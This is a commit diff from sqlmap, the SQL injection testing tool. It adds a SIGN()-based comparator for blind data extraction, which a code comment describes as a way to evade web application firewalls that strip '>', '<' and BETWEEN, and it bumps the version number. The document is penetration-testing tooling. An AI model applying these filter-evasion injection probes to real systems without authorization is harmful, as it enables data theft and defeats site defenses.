Expanding Esperanto engine with SIGN

This commit is contained in:
Miroslav Štampar 2026-07-21 13:53:45 +02:00
parent 9925adf799
commit e8512c8c13
3 changed files with 8 additions and 1 deletions

View file

@ -429,6 +429,11 @@ class _Discovery(object):
elif self._ask("2 BETWEEN 2 AND 3") and not self._ask("5 BETWEEN 2 AND 3"):
self._comparator = "between"
self.dialect.notes.append("'>' unusable; bisecting via BETWEEN")
elif self._ask("SIGN(2-1)=1") and not self._ask("SIGN(2-3)=1") and not self._ask("SIGN(2-2)=1"):
# ordered, log2-efficient, yet needs NO comparison operator (only SIGN(), '-', '=') -
# survives a WAF stripping '>' AND '<' AND BETWEEN, without dropping to slow membership
self._comparator = "sign"
self.dialect.notes.append("'>'/BETWEEN unusable; bisecting via SIGN() (no comparison operator)")
else:
self._comparator = "membership"
self.dialect.notes.append("no ordered comparator; using order-free IN() subset bisection")

View file

@ -133,6 +133,8 @@ class _Extraction(object):
# BETWEEN expresses the same range test without the '>'/'<' a WAF may strip.
if self._comparator == "between":
return self._ask("%s BETWEEN %d AND %d" % (expr, n + 1, high))
if self._comparator == "sign":
return self._ask("SIGN((%s)-(%d))=1" % (expr, n))
return self._ask("%s>%d" % (expr, n))
def _numDefined(self, expr):

View file

@ -20,7 +20,7 @@ from lib.core.enums import OS
from thirdparty import six
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.10.7.169"
VERSION = "1.10.7.170"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)